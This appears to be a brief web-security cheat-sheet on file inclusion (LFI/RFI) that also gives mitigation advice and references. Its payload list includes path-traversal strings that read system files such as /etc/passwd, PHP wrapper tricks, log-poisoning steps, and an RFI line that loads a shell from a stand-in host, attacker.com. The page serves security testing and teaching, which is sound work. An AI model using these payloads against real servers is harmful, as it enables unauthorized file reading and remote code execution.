File Inclusion Lfi Rfi

Overview

File Inclusion (LFI/RFI) is a vulnerability that allows an attacker to include files on a server through the web browser. LFI occurs when an application uses user-supplied input to dynamically include files without proper validation, allowing an attacker to read sensitive files or execute malicious code.

RFI (Remote File Inclusion) enables an attacker to include remote files, typically leading to remote code execution.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting File Inclusion Lfi Rfi:

../../../etc/passwd

..\\..\\..\\windows\\win.ini

....//....//....//etc/passwd

php://filter/convert.base64-encode/resource=index.php

php://filter/resource=/etc/passwd

data://text/plain;base64,<base64>

../../../var/log/apache2/access.log

http://attacker.com/shell.txt?

Tools & Techniques

Recommended tools for File Inclusion Lfi Rfi:

• Test parameters: file, page, include, template, view, load, read, document, folder, path, module
• PHP wrappers: php://filter, php://input, data://, expect://
• Log poisoning: inject PHP into access logs, then include them
• /proc/self/environ or /proc/self/fd/* for LFI-to-RCE

Prevention & Mitigation

Security recommendations to prevent File Inclusion Lfi Rfi:

• Avoid dynamic file inclusion based on user input
• Use a whitelist of allowed files and paths
• Disable dangerous PHP functions (allow_url_include, allow_url_fopen)
• Run application with minimal file system permissions
• Implement proper input validation and sanitization

References

Additional resources:

• https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
• https://highon.coffee/blog/lfi-cheat-sheet/
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion